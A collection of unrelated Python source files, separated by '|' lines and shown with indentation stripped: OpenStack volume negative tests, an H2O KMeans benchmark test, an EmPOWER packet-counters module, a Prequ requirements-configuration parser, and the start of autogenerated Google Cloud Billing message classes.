def test_volume_extend_without_passing_volume_id(self):
# Extend volume size when passing volume id is None.
extend_size = int(self.volume['size']) + 1
self.assertRaises(exceptions.NotFound, self.client.extend_volume,
None, extend_size)
@test.attr(type=['negative', 'gate'])
def test_reserve_volume_with_nonexistent_volume_id(self):
self.assertRaises(exceptions.NotFound,
self.client.reserve_volume,
str(uuid.uuid4()))
@test.attr(type=['negative', 'gate'])
def test_unreserve_volume_with_nonexistent_volume_id(self):
self.assertRaises(exceptions.NotFound,
self.client.unreserve_volume,
str(uuid.uuid4()))
@test.attr(type=['negative', 'gate'])
def test_reserve_volume_with_negative_volume_status(self):
# Mark volume as reserved.
resp, body = self.client.reserve_volume(self.volume['id'])
self.assertEqual(202, resp.status)
# Reserving a volume that is already reserved should fail
self.assertRaises(exceptions.BadRequest,
self.client.reserve_volume,
self.volume['id'])
# Unmark volume as reserved.
resp, body = self.client.unreserve_volume(self.volume['id'])
self.assertEqual(202, resp.status)
@test.attr(type=['negative', 'gate'])
def test_list_volumes_with_nonexistent_name(self):
v_name = data_utils.rand_name('Volume-')
params = {'display_name': v_name}
resp, fetched_volume = self.client.list_volumes(params)
self.assertEqual(200, resp.status)
self.assertEqual(0, len(fetched_volume))
@test.attr(type=['negative', 'gate'])
def test_list_volumes_detail_with_nonexistent_name(self):
v_name = data_utils.rand_name('Volume-')
params = {'display_name': v_name}
resp, fetched_volume = self.client.list_volumes_with_detail(params)
self.assertEqual(200, resp.status)
self.assertEqual(0, len(fetched_volume))
@test.attr(type=['negative', 'gate'])
def test_list_volumes_with_invalid_status(self):
params = {'status': 'null'}
resp, fetched_volume = self.client.list_volumes(params)
self.assertEqual(200, resp.status)
self.assertEqual(0, len(fetched_volume))
@test.attr(type=['negative', 'gate'])
def test_list_volumes_detail_with_invalid_status(self):
params = {'status': 'null'}
resp, fetched_volume = self.client.list_volumes_with_detail(params)
self.assertEqual(200, resp.status)
self.assertEqual(0, len(fetched_volume))
class VolumesNegativeTestXML(VolumesNegativeTest):
_interface = 'xml'
|
|
import unittest, time, sys, random, math, json
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_kmeans, h2o_import as h2i, h2o_common
print "Assumes you ran ../build_for_clone.py in this directory"
print "Using h2o-nodes.json. Also the sandbox dir"
DELETE_KEYS_EACH_ITER = True
DO_KMEANS = True
NA_COL_BUG = True
SCALE_SIZE = 7 # for scaling the expected results from the 180GB case (7x the 26GB case)
# assumes the cloud was built with CDH3? maybe doesn't matter as long as the file is there
FROM_HDFS = 'CDH3' # only the truthiness is checked; the value itself is unused
class releaseTest(h2o_common.ReleaseCommon, unittest.TestCase):
def test_c5_KMeans_sphere_26GB_fvec(self):
# a kludge
h2o.setup_benchmark_log()
# csvFilename = 'syn_sphere15_2711545732row_6col_180GB_from_7x.csv'
csvFilename = 'syn_sphere15_gen_26GB.csv'
# csvFilename = 'syn_sphere_gen_h1m.csv'
# csvFilename = 'syn_sphere_gen_real_1.49M.csv'
# csvFilename = 'syn_sphere_gen_h1m_no_na.csv'
totalBytes = 183538602156
if FROM_HDFS:
importFolderPath = "datasets/kmeans_big"
csvPathname = importFolderPath + '/' + csvFilename
else:
importFolderPath = "/home3/0xdiag/datasets/kmeans_big"
csvPathname = importFolderPath + '/' + csvFilename
# FIX! put right values in
# will there be different expected for random vs the other inits?
if NA_COL_BUG:
expected = [
# the centers are the same for the 26GB and 180GB. The # of rows is right for 180GB,
# so shouldn't be used for 26GB
# or it should be divided by 7
# the distribution is the same, obviously.
([-113.00566692375459, -89.99595447985321, -455.9970643424373, 4732.0, 49791778.0, 36800.0], 248846122, 1308149283316.2988) ,
([1.0, 1.0, -525.0093818313685, 2015.001629398412, 25654042.00592703, 28304.0], 276924291, 1800760152555.98) ,
([5.0, 2.0, 340.0, 1817.995920197288, 33970406.992053084, 31319.99486705394], 235089554, 375419158808.3253) ,
([10.0, -72.00113070337981, -171.0198611715457, 4430.00952228909, 37007399.0, 29894.0], 166180630, 525423632323.6474) ,
([11.0, 3.0, 578.0043558141306, 1483.0163188052604, 22865824.99639042, 5335.0], 167234179, 1845362026223.1094) ,
([12.0, 3.0, 168.0, -4066.995950679284, 41077063.00269915, -47537.998050740985], 195420925, 197941282992.43475) ,
([19.00092954923767, -10.999565572612255, 90.00028669073289, 1928.0, 39967190.0, 27202.0], 214401768, 11868360232.658035) ,
([20.0, 0.0, 141.0, -3263.0030236302937, 6163210.990273981, 30712.99115201907], 258853406, 598863991074.3276) ,
([21.0, 114.01584574295777, 242.99690338815898, 1674.0029079209912, 33089556.0, 36415.0], 190979054, 1505088759456.314) ,
([25.0, 1.0, 614.0032787274755, -2275.9931284021022, -48473733.04122273, 47343.0], 87794427, 1124697008162.3955) ,
([39.0, 3.0, 470.0, -3337.9880599007597, 28768057.98852736, 16716.003410920028], 78226988, 1151439441529.0215) ,
([40.0, 1.0, 145.0, 950.9990795199593, 14602680.991458317, -14930.007919032574], 167273589, 693036940951.0249) ,
([42.0, 4.0, 479.0, -3678.0033024834297, 8209673.001421165, 11767.998552236539], 148426180, 35942838893.32379) ,
([48.0, 4.0, 71.0, -951.0035145455234, 49882273.00063991, -23336.998167498707], 157533313, 88431531357.62982) ,
([147.00394564757505, 122.98729664236723, 311.0047920137008, 2320.0, 46602185.0, 11212.0], 118361306, 1111537045743.7646) ,
]
else:
expected = [
([0.0, -113.00566692375459, -89.99595447985321, -455.9970643424373, 4732.0, 49791778.0, 36800.0], 248846122, 1308149283316.2988) ,
([0.0, 1.0, 1.0, -525.0093818313685, 2015.001629398412, 25654042.00592703, 28304.0], 276924291, 1800760152555.98) ,
([0.0, 5.0, 2.0, 340.0, 1817.995920197288, 33970406.992053084, 31319.99486705394], 235089554, 375419158808.3253) ,
([0.0, 10.0, -72.00113070337981, -171.0198611715457, 4430.00952228909, 37007399.0, 29894.0], 166180630, 525423632323.6474) ,
([0.0, 11.0, 3.0, 578.0043558141306, 1483.0163188052604, 22865824.99639042, 5335.0], 167234179, 1845362026223.1094) ,
([0.0, 12.0, 3.0, 168.0, -4066.995950679284, 41077063.00269915, -47537.998050740985], 195420925, 197941282992.43475) ,
([0.0, 19.00092954923767, -10.999565572612255, 90.00028669073289, 1928.0, 39967190.0, 27202.0], 214401768, 11868360232.658035) ,
([0.0, 20.0, 0.0, 141.0, -3263.0030236302937, 6163210.990273981, 30712.99115201907], 258853406, 598863991074.3276) ,
([0.0, 21.0, 114.01584574295777, 242.99690338815898, 1674.0029079209912, 33089556.0, 36415.0], 190979054, 1505088759456.314) ,
([0.0, 25.0, 1.0, 614.0032787274755, -2275.9931284021022, -48473733.04122273, 47343.0], 87794427, 1124697008162.3955) ,
([0.0, 39.0, 3.0, 470.0, -3337.9880599007597, 28768057.98852736, 16716.003410920028], 78226988, 1151439441529.0215) ,
([0.0, 40.0, 1.0, 145.0, 950.9990795199593, 14602680.991458317, -14930.007919032574], 167273589, 693036940951.0249) ,
([0.0, 42.0, 4.0, 479.0, -3678.0033024834297, 8209673.001421165, 11767.998552236539], 148426180, 35942838893.32379) ,
([0.0, 48.0, 4.0, 71.0, -951.0035145455234, 49882273.00063991, -23336.998167498707], 157533313, 88431531357.62982) ,
([0.0, 147.00394564757505, 122.98729664236723, 311.0047920137008, 2320.0, 46602185.0, 11212.0], 118361306, 1111537045743.7646) ,
]
# benchmarkLogging = ['cpu','disk', 'network', 'iostats', 'jstack']
# benchmarkLogging = ['cpu','disk', 'network', 'iostats']
# IOStatus can hang?
# benchmarkLogging = ['cpu', 'disk', 'network']
benchmarkLogging = []
for trial in range(6):
# IMPORT**********************************************
# since H2O deletes the source key, re-import every iteration.
# PARSE ****************************************
print "Parse starting: " + csvFilename
hex_key = csvFilename + "_" + str(trial) + ".hex"
start = time.time()
timeoutSecs = 2 * 3600
kwargs = {}
if FROM_HDFS:
parseResult = h2i.import_parse(path=csvPathname, schema='hdfs', hex_key=hex_key,
timeoutSecs=timeoutSecs, pollTimeoutSecs=60, retryDelaySecs=2,
benchmarkLogging=benchmarkLogging, doSummary=False, **kwargs)
else:
parseResult = h2i.import_parse(path=csvPathname, schema='local', hex_key=hex_key,
timeoutSecs=timeoutSecs, pollTimeoutSecs=60, retryDelaySecs=2,
benchmarkLogging=benchmarkLogging, doSummary=False, **kwargs)
elapsed = time.time() - start
fileMBS = (totalBytes/1e6)/elapsed
l = '{!s} jvms, {!s}GB heap, {:s} {:s} {:6.2f} MB/sec for {:.2f} secs'.format(
len(h2o.nodes), h2o.nodes[0].java_heap_GB, 'Parse', csvPathname, fileMBS, elapsed)
print "\n"+l
h2o.cloudPerfH2O.message(l)
inspect = h2o_cmd.runInspect(key=parseResult['destination_key'], timeoutSecs=300)
numRows = inspect['numRows']
numCols = inspect['numCols']
summary = h2o_cmd.runSummary(key=parseResult['destination_key'], numRows=numRows, numCols=numCols, timeoutSecs=300)
h2o_cmd.infoFromSummary(summary)
# KMeans ****************************************
if not DO_KMEANS:
continue
print "col 0 is enum in " + csvFilename + " but KMeans should skip that automatically?? or no?"
kwargs = {
'k': 15,
'max_iter': 500,
# 'normalize': 1,
'normalize': 0, # temp try
'initialization': 'Furthest',
'destination_key': 'junk.hex',
# we get NaNs if whole col is NA
'ignored_cols': 'C1',
# reuse the same seed, to get deterministic results
'seed': 265211114317615310,
}
if (trial%3)==0:
kwargs['initialization'] = 'PlusPlus'
elif (trial%3)==1:
kwargs['initialization'] = 'Furthest'
else:
kwargs['initialization'] = None
timeoutSecs = 4 * 3600
params = kwargs
paramsString = json.dumps(params)
start = time.time()
kmeansResult = h2o_cmd.runKMeans(parseResult=parseResult, timeoutSecs=timeoutSecs,
benchmarkLogging=benchmarkLogging, **kwargs)
elapsed = time.time() - start
print "kmeans end on ", csvPathname, 'took', elapsed, 'seconds.', "%d pct. of timeout" % ((elapsed/timeoutSecs) * 100)
print "kmeans result:", h2o.dump_json(kmeansResult)
l = '{!s} jvms, {!s}GB heap, {:s} {:s} {:s} for {:.2f} secs {:s}' .format(
len(h2o.nodes), h2o.nodes[0].java_heap_GB, "KMeans", "trial "+str(trial), csvFilename, elapsed, paramsString)
print l
h2o.cloudPerfH2O.message(l)
# this does predict
(centers, tupleResultList) = h2o_kmeans.bigCheckResults(self, kmeansResult, csvPathname, parseResult, 'd', **kwargs)
# all are multipliers of expected tuple value
allowedDelta = (0.01, 0.01, 0.01)
# these clusters were sorted compared to the cluster order in training
h2o_kmeans.showClusterDistribution(self, tupleResultList, expected, trial=trial)
# why is the expected # of rows not right in KMeans2. That means predictions are wrong
h2o_kmeans.compareResultsToExpected(self, tupleResultList, expected, allowedDelta, allowError=False,
allowRowError=True, trial=trial)
# the tupleResultList has the size during predict? compare it to the sizes during training
# I assume they're in the same order.
model = kmeansResult['model']
size = model['size']
size2 = [t[1] for t in tupleResultList]
if 1==1: # debug
print "training size:", size
print "predict size2:", size2
print "training sorted(size):", sorted(size)
print "predict sorted(size2):", sorted(size2)
print h2o.nodes[0].http_addr
print h2o.nodes[0].port
clusters = model["centers"]
cluster_variances = model["within_cluster_variances"]
error = model["total_within_SS"]
iterations = model["iterations"]
normalized = model["normalized"]
max_iter = model["max_iter"]
print "iterations", iterations
if iterations >= (max_iter-1): # h2o hits the limit at max_iter-1..shouldn't hit it
raise Exception("trial: %s KMeans unexpectedly took %s iterations..which was the full amount allowed by max_iter %s",
(trial, iterations, max_iter))
# this size stuff should be compared now in compareResultsToExpected()..leave it here to make sure
# can't do this compare, because size2 is sorted by center order..
# so we don't know how to reorder size the same way
# we could just sort the two of them, for some bit of comparison.
if sorted(size)!=sorted(size2):
raise Exception("trial: %s training cluster sizes: %s not the same as predict on same data: %s" % (trial, size, size2))
# our expected result is ordered by cluster center, but the sizes are from the predicted histogram
expectedSize = [t[1]/SCALE_SIZE for t in expected]
if size2!=expectedSize:
raise Exception("trial: %s predicted cluster sizes: %s not the same as expected: %s" % (trial, size2, expectedSize))
if DELETE_KEYS_EACH_ITER:
h2i.delete_keys_at_all_nodes()
if __name__ == '__main__':
h2o.unit_main()
|
|
#!/usr/bin/env python3
#
# Copyright (c) 2016 Roberto Riggio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Common counters module."""
from construct import UBInt8
from construct import Bytes
from construct import Sequence
from construct import Container
from construct import Struct
from construct import UBInt16
from construct import UBInt32
from construct import Array
from empower.datatypes.etheraddress import EtherAddress
from empower.lvapp.lvappserver import ModuleLVAPPWorker
from empower.core.module import Module
from empower.core.lvap import LVAP
from empower.lvapp import PT_VERSION
from empower.main import RUNTIME
PT_STATS_REQUEST = 0x17
PT_STATS_RESPONSE = 0x18
STATS = Sequence("stats", UBInt16("bytes"), UBInt32("count"))
STATS_REQUEST = Struct("stats_request", UBInt8("version"),
UBInt8("type"),
UBInt16("length"),
UBInt32("seq"),
UBInt32("module_id"),
Bytes("sta", 6))
STATS_RESPONSE = \
Struct("stats_response", UBInt8("version"),
UBInt8("type"),
UBInt16("length"),
UBInt32("seq"),
UBInt32("module_id"),
Bytes("wtp", 6),
Bytes("sta", 6),
UBInt16("nb_tx"),
UBInt16("nb_rx"),
Array(lambda ctx: ctx.nb_tx + ctx.nb_rx, STATS))
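# Wire layout sketch (as implied by the Structs above): a response starts with
# the common header (version, type, length, seq, module_id), then the WTP and
# station MAC addresses, the nb_tx/nb_rx sample counts, and finally
# nb_tx + nb_rx (bytes, count) pairs -- TX samples first, RX samples after.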
class Counters(Module):
""" PacketsCounter object. """
MODULE_NAME = "counters"
REQUIRED = ['module_type', 'worker', 'tenant_id', 'lvap']
def __init__(self):
Module.__init__(self)
# parameters
self._lvap = None
self._bins = [8192]
# data structures
self.tx_packets = []
self.rx_packets = []
self.tx_bytes = []
self.rx_bytes = []
def __eq__(self, other):
return super().__eq__(other) and \
self.lvap == other.lvap and \
self.bins == other.bins
@property
def lvap(self):
"""Return the LVAP Address."""
return self._lvap
@lvap.setter
def lvap(self, value):
"""Set the LVAP Address."""
self._lvap = EtherAddress(value)
@property
def bins(self):
""" Return the lvaps list """
return self._bins
@bins.setter
def bins(self, bins):
""" Set the distribution bins. Default is [ 8192 ]. """
if len(bins) > 0:
if [x for x in bins if isinstance(x, int)] != bins:
raise ValueError("bins values must be integers")
if sorted(bins) != bins:
raise ValueError("bins must be monotonically increasing")
if sorted(set(bins)) != sorted(bins):
raise ValueError("bins values must not contain duplicates")
if [x for x in bins if x > 0] != bins:
raise ValueError("bins values must be positive")
self._bins = bins
def to_dict(self):
""" Return a JSON-serializable dictionary representing the Stats """
out = super().to_dict()
out['bins'] = self.bins
out['lvap'] = self.lvap
out['tx_bytes'] = self.tx_bytes
out['rx_bytes'] = self.rx_bytes
out['tx_packets'] = self.tx_packets
out['rx_packets'] = self.rx_packets
return out
def run_once(self):
""" Send out stats request. """
if self.tenant_id not in RUNTIME.tenants:
self.log.info("Tenant %s not found", self.tenant_id)
self.unload()
return
tenant = RUNTIME.tenants[self.tenant_id]
if self.lvap not in tenant.lvaps:
self.log.info("LVAP %s not found", self.lvap)
return
lvap = tenant.lvaps[self.lvap]
if not lvap.wtp.connection or lvap.wtp.connection.stream.closed():
self.log.info("WTP %s not connected", lvap.wtp.addr)
return
stats_req = Container(version=PT_VERSION,
type=PT_STATS_REQUEST,
length=18,
seq=lvap.wtp.seq,
module_id=self.module_id,
sta=lvap.addr.to_raw())
self.log.info("Sending %s request to %s @ %s (id=%u)",
self.MODULE_NAME, lvap.addr, lvap.wtp.addr,
self.module_id)
msg = STATS_REQUEST.build(stats_req)
lvap.wtp.connection.stream.write(msg)
def fill_bytes_samples(self, data):
""" Compute samples.
Samples are in the following format (after ordering):
[[60, 3], [66, 2], [74, 1], [98, 40], [167, 2], [209, 2], [1466, 1762]]
Each 2-tuple has the format [ size, count ], where count is the number
of frames of that size in bytes (including the Ethernet II header)
TX/RX by the LVAP.
"""
samples = sorted(data, key=lambda entry: entry[0])
out = [0] * len(self.bins)
for entry in samples:
if len(entry) == 0:
continue
size = entry[0]
count = entry[1]
for i in range(0, len(self.bins)):
if size <= self.bins[i]:
out[i] = out[i] + size * count
break
return out
def fill_packets_samples(self, data):
""" Compute samples.
Samples are in the following format (after ordering):
[[60, 3], [66, 2], [74, 1], [98, 40], [167, 2], [209, 2], [1466, 1762]]
Each 2-tuple has the format [ size, count ], where count is the number
of frames of that size in bytes (including the Ethernet II header)
TX/RX by the LVAP.
"""
samples = sorted(data, key=lambda entry: entry[0])
out = [0] * len(self.bins)
for entry in samples:
if len(entry) == 0:
continue
size = entry[0]
count = entry[1]
for i in range(0, len(self.bins)):
if size <= self.bins[i]:
out[i] = out[i] + count
break
return out
def handle_response(self, response):
"""Handle an incoming STATS_RESPONSE message.
Args:
response, a STATS_RESPONSE message
Returns:
None
"""
# update this object
tx_samples = response.stats[0:response.nb_tx]
rx_samples = response.stats[response.nb_tx:]
self.tx_bytes = self.fill_bytes_samples(tx_samples)
self.rx_bytes = self.fill_bytes_samples(rx_samples)
self.tx_packets = self.fill_packets_samples(tx_samples)
self.rx_packets = self.fill_packets_samples(rx_samples)
# call callback
self.handle_callback(self)
class CountersWorker(ModuleLVAPPWorker):
"""Counter worker."""
pass
def counters(**kwargs):
"""Create a new module."""
worker = RUNTIME.components[CountersWorker.__module__]
return worker.add_module(**kwargs)
def bound_counters(self, **kwargs):
"""Create a new module (app version)."""
kwargs['tenant_id'] = self.tenant.tenant_id
kwargs['lvap'] = self.addr
return counters(**kwargs)
setattr(LVAP, Counters.MODULE_NAME, bound_counters)
def launch():
""" Initialize the module. """
return CountersWorker(Counters, PT_STATS_RESPONSE, STATS_RESPONSE)
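# Illustrative app-side usage sketch (hypothetical parameter values): once
# launch() has registered the worker, an application can poll counters via
# the bound LVAP helper, e.g.:
#   lvap.counters(bins=[512, 1514, 8192], every=5000, callback=my_handler)
# where my_handler would receive the updated Counters instance per response.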
|
|
"""
Prequ configuration file definition and parsing.
"""
from __future__ import unicode_literals
import io
import os
import re
from collections import defaultdict
from contextlib import contextmanager
from glob import glob
from .ini_parser import bool_or_auto, parse_ini
from .repositories.pypi import PyPIRepository
DEFAULT_INDEX_URL = PyPIRepository.DEFAULT_INDEX_URL
text = type('')
class PrequConfiguration(object):
"""
Prequ configuration specification.
Prequ configuration defines the source requirement set(s) and some
options to control aspects of the requirements files generation.
Each source requirement set is a list of package names with an
optional version specifier. It is possible to have several source
requirement sets defined. A single requirements file will be
generated from each set. These sets are addressed by a label which
determines the output file name. Label "base" is the default and
its output is "requirements.txt". Other output files are named
"requirements-{label}.txt" by their labels.
"""
fields = [
('options.annotate', bool_or_auto),
('options.generate_hashes', bool_or_auto),
('options.header', bool_or_auto),
('options.index_url', text),
('options.extra_index_urls', [text]),
('options.trusted_hosts', [text]),
('options.wheel_dir', text),
('options.wheel_sources', {text: text}),
('requirements', {text: text}),
]
@classmethod
def from_directory(cls, directory):
"""
Get Prequ configuration from a directory.
Reads the Prequ configuration file(s) in the directory and
parses it/them to a PrequConfiguration object. Supported
configuration files are:
* setup.cfg, [prequ] section
* requirements.in and requirements-*.in
If both setup.cfg and requirements*.in files exist, then options
and source requirement sets specified in the setup.cfg are
merged with the source requirement sets defined by the in-files.
:type directory: str
:rtype: PrequConfiguration
"""
def path(filename):
return os.path.join(directory, filename)
in_files = (
glob(path('requirements.in')) +
glob(path('requirements-*.in')))
in_requirements = cls._read_in_files(in_files)
setup_cfg = path('setup.cfg')
conf_data = (cls._read_ini_file(setup_cfg)
if os.path.exists(setup_cfg) else None) or {}
if in_requirements:
conf_data.setdefault('requirements', {}).update(in_requirements)
if conf_data:
return cls.from_dict(conf_data)
raise NoPrequConfigurationFound(
'Cannot find Prequ configuration. '
'Add [prequ] section to your setup.cfg.')
@classmethod
def from_ini(cls, fileobj, section_name='prequ'):
conf_data = cls._read_ini_file(fileobj, section_name)
return cls.from_dict(conf_data) if conf_data else None
@classmethod
def _read_ini_file(cls, fileobj, section_name='prequ'):
field_specs = {
key.split('options.', 1)[1]: value
for (key, value) in cls.fields
if key.startswith('options.')
}
with _get_fileobj(fileobj, 'rt', 'utf-8') as fp:
data = parse_ini(fp, field_specs, section_name=section_name)
if data is None:
return None
opts = {}
reqs = {}
for (key, value) in data.items():
if key == 'requirements':
reqs['base'] = value
elif key.startswith('requirements-'):
reqs[key.split('requirements-', 1)[1]] = value
else:
opts[key] = value
return {'options': opts, 'requirements': reqs}
@classmethod
def from_in_files(cls, *filenames):
return cls.from_dict({'requirements': cls._read_in_files(filenames)})
@classmethod
def _read_in_files(cls, filenames):
reqs = {}
for filepath in filenames:
fn = os.path.basename(filepath)
if fn == 'requirements.in':
label = 'base'
elif fn.startswith('requirements-') and fn.endswith('.in'):
label = fn.split('requirements-', 1)[1].rsplit('.in', 1)[0]
else:
raise InvalidPrequConfiguration(
'Invalid in-file name: {}'.format(fn))
with io.open(filepath, 'rt', encoding='utf-8') as fp:
reqs[label] = fp.read()
return reqs
@classmethod
def from_dict(cls, conf_data):
errors = get_data_errors(conf_data, cls.fields)
if errors:
raise InvalidPrequConfiguration(
'Errors in Prequ configuration: {}'.format(', '.join(errors)))
input_reqs = conf_data['requirements']
(requirement_sets, extra_opts) = parse_input_requirements(input_reqs)
options = conf_data.get('options', {})
options.update(extra_opts)
return cls(requirement_sets, **options)
def __init__(self, requirement_sets, **kwargs):
assert isinstance(requirement_sets, dict)
assert all(isinstance(x, text) for x in requirement_sets.values())
self.requirement_sets = requirement_sets
self.annotate = kwargs.pop('annotate', 'auto')
self.generate_hashes = kwargs.pop('generate_hashes', 'auto')
self.header = kwargs.pop('header', 'auto')
self.index_url = kwargs.pop('index_url', DEFAULT_INDEX_URL)
self.extra_index_urls = kwargs.pop('extra_index_urls', [])
self.trusted_hosts = kwargs.pop('trusted_hosts', [])
self.wheel_dir = kwargs.pop('wheel_dir', None)
#: Wheel source map, format: {wheel_src_name: url_template}
self.wheel_sources = kwargs.pop('wheel_sources', {})
#: List of wheels to build, format [(wheel_src_name, pkg, ver)]
self.wheels_to_build = kwargs.pop('wheels_to_build', [])
@property
def labels(self):
def sort_key(label):
return (0, label) if label == 'base' else (1, label)
return sorted(self.requirement_sets.keys(), key=sort_key)
def get_output_file_for(self, label):
"""
Get output file name for a requirement set.
:type label: text
:rtype: text
"""
return (
'requirements.txt' if label == 'base' else
'requirements-{}.txt'.format(label))
def get_requirements_in_for(self, label):
"""
Get requirements.in file content for a requirement set.
:type label: text
:rtype: text
"""
constraint_line = (
'-c {}\n'.format(self.get_output_file_for('base'))
if label != 'base' and 'base' in self.requirement_sets
else '')
return constraint_line + self.requirement_sets[label]
def get_wheels_to_build(self):
for (wheel_src_name, pkg, ver) in self.wheels_to_build:
url_template = self.wheel_sources.get(wheel_src_name)
if not url_template:
raise UnknownWheelSource(wheel_src_name)
url = url_template.format(pkg=pkg, ver=ver)
yield (pkg, ver, url)
def get_prequ_compile_options(self):
options = {
'annotate': self._detect(self.annotate, ' # via '),
'header': self._detect(self.header, 'generated by ', True),
'generate_hashes': self._detect(self.generate_hashes, ' --hash='),
}
if self.index_url != DEFAULT_INDEX_URL:
options['index_url'] = self.index_url
if self.extra_index_urls:
options['extra_index_url'] = self.extra_index_urls
if self.trusted_hosts:
options['trusted_host'] = self.trusted_hosts
if self.wheel_dir:
options['find_links'] = [self.wheel_dir]
return options
def _detect(self, value, detector_text, default_if_no_files=False):
"""
Detect value for bool_or_auto variable.
"""
if value == 'auto':
files = self._get_existing_output_files()
if not files:
return default_if_no_files
return _is_text_in_any_file(detector_text, files)
return value
def _get_existing_output_files(self):
output_files = (self.get_output_file_for(x) for x in self.labels)
return [x for x in output_files if os.path.exists(x)]
def get_pip_options(self):
options = []
if self.index_url != DEFAULT_INDEX_URL:
options.append('--index-url {}\n'.format(self.index_url))
for extra_index_url in self.extra_index_urls:
options.append('--extra-index-url {}\n'.format(extra_index_url))
for trusted_host in self.trusted_hosts:
options.append('--trusted-host {}\n'.format(trusted_host))
if self.wheel_dir:
options.append('--find-links {}\n'.format(self.wheel_dir))
return options
@contextmanager
def _get_fileobj(file_or_filename, mode='rb', encoding=None):
if isinstance(file_or_filename, (bytes, type(u''))):
with io.open(file_or_filename, mode, encoding=encoding) as fp:
yield fp
else:
yield file_or_filename
def _is_text_in_any_file(text, files):
encoded_text = text.encode('utf-8')
for filename in files:
with open(filename, 'rb') as fp:
if encoded_text in fp.read():
return True
return False
def get_data_errors(data, field_types):
return (
list(_get_key_errors(data, field_types)) +
list(_get_type_errors(data, field_types)))
def _get_key_errors(data, field_types):
top_level_keys = {x.split('.', 1)[0] for (x, _) in field_types}
second_level_keys_map = defaultdict(set)
for (fieldspec, _) in field_types:
if '.' in fieldspec:
(key, subkey) = fieldspec.split('.', 2)[:2]
second_level_keys_map[key].add(subkey)
for (key, value) in data.items():
if key not in top_level_keys:
yield 'Unknown key name: "{}"'.format(key)
if isinstance(value, dict) and key in second_level_keys_map:
second_level_keys = second_level_keys_map[key]
for (subkey, subvalue) in value.items():
if subkey not in second_level_keys:
yield 'Unknown key name: "{}.{}"'.format(key, subkey)
def _get_type_errors(data, field_types):
unspecified = object()
for (fieldspec, typespec) in field_types:
value = data
keypath = []
for key in fieldspec.split('.'):
if value is not unspecified:
if isinstance(value, dict):
value = value.get(key, unspecified)
else:
yield 'Field "{}" should be dict'.format('.'.join(keypath))
value = unspecified
keypath.append(key)
if value is unspecified:
continue
error = _get_type_error(value, typespec, fieldspec)
if error:
yield error
def _get_type_error(value, typespec, fieldspec):
if typespec == bool_or_auto:
typespec = (bool if value != 'auto' else text)
return _get_type_error_for_basic_type(value, typespec, fieldspec)
def _get_type_error_for_basic_type(value, typespec, fieldspec):
if isinstance(typespec, list):
if not isinstance(value, list):
return 'Field "{}" should be list'.format(fieldspec)
itemtype = typespec[0]
if not all(isinstance(x, itemtype) for x in value):
typename = itemtype.__name__
return 'Values of "{}" should be {}'.format(fieldspec, typename)
elif isinstance(typespec, dict):
if not isinstance(value, dict):
return 'Field "{}" should be dict'.format(fieldspec)
(keytype, valuetype) = list(typespec.items())[0]
if not all(isinstance(x, keytype) for x in value.keys()):
keytypename = keytype.__name__
return 'Keys of "{}" should be {}'.format(fieldspec, keytypename)
if not all(isinstance(x, valuetype) for x in value.values()):
valtypename = valuetype.__name__
return 'Values of "{}" should be {}'.format(fieldspec, valtypename)
else:
if not isinstance(typespec, type):
raise ValueError('Invalid type specifier for "{}": {!r}'
.format(fieldspec, typespec))
if not isinstance(value, typespec):
typename = typespec.__name__
return 'Field "{}" should be {}'.format(fieldspec, typename)
def parse_input_requirements(input_requirements):
extra_opts = {}
requirement_sets = {}
for (label, req_data) in input_requirements.items():
(requirement_set, opts) = _parse_req_data(req_data)
_merge_update_dict(extra_opts, opts)
requirement_sets[label] = requirement_set
return (requirement_sets, extra_opts)
def _parse_req_data(req_data):
result_lines = []
wheels_to_build = [] # [(wheel_src_name, pkg, ver)]
for line in req_data.splitlines():
match = WHEEL_LINE_RX.match(line)
if match:
(wheel_data, req_line) = _parse_wheel_match(
line, **match.groupdict())
wheels_to_build.append(wheel_data)
result_lines.append(req_line)
else:
result_lines.append(line)
return ('\n'.join(result_lines), {'wheels_to_build': wheels_to_build})
WHEEL_LINE_RX = re.compile(
r'^\s*(?P<pkg>(\w|-)+)(?P<verspec>\S*)\s+'
r'\(\s*wheel from \s*(?P<wheel_src_name>\S+)\)$')
def _parse_wheel_match(line, pkg, verspec, wheel_src_name):
if not verspec.startswith('=='):
raise InvalidPrequConfiguration(
'Wheel lines must use "==" version specifier: {}'.format(line))
ver = verspec[2:]
wheel_data = (wheel_src_name, pkg, ver)
req_line = pkg + verspec
return (wheel_data, req_line)
def _merge_update_dict(dest_dict, src_dict):
for (key, value) in src_dict.items():
if isinstance(value, dict):
_merge_update_dict(dest_dict.setdefault(key, {}), value)
elif isinstance(value, list):
dest_dict[key] = dest_dict.get(key, []) + value
elif isinstance(value, set):
dest_dict[key] = dest_dict.get(key, set()) | value
else:
dest_dict[key] = value
class Error(Exception):
pass
class NoPrequConfigurationFound(Error):
pass
class InvalidPrequConfiguration(Error):
pass
class UnknownWheelSource(Error):
def __init__(self, name):
msg = 'No URL template defined for "{}"'.format(name)
super(UnknownWheelSource, self).__init__(msg)
|
|
"""Generated message classes for cloudbilling version v1.
Allows developers to manage billing for their Google Cloud Platform projects
programmatically.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
package = 'cloudbilling'
class BillingAccount(_messages.Message):
"""A billing account in [Google Cloud
Console](https://console.cloud.google.com/). You can assign a billing
account to one or more projects.
Fields:
displayName: The display name given to the billing account, such as `My
Billing Account`. This name is displayed in the Google Cloud Console.
name: The resource name of the billing account. The resource name has the
form `billingAccounts/{billing_account_id}`. For example,
`billingAccounts/012345-567890-ABCDEF` would be the resource name for
billing account `012345-567890-ABCDEF`.
open: True if the billing account is open, and will therefore be charged
for any usage on associated projects. False if the billing account is
closed, and therefore projects associated with it will be unable to use
paid services.
"""
displayName = _messages.StringField(1)
name = _messages.StringField(2)
open = _messages.BooleanField(3)
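# Illustrative construction (values taken from the docstring example):
#   account = BillingAccount(
#       displayName='My Billing Account',
#       name='billingAccounts/012345-567890-ABCDEF',
#       open=True)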
class CloudbillingBillingAccountsGetRequest(_messages.Message):
"""A CloudbillingBillingAccountsGetRequest object.
Fields:
name: The resource name of the billing account to retrieve. For example,
`billingAccounts/012345-567890-ABCDEF`.
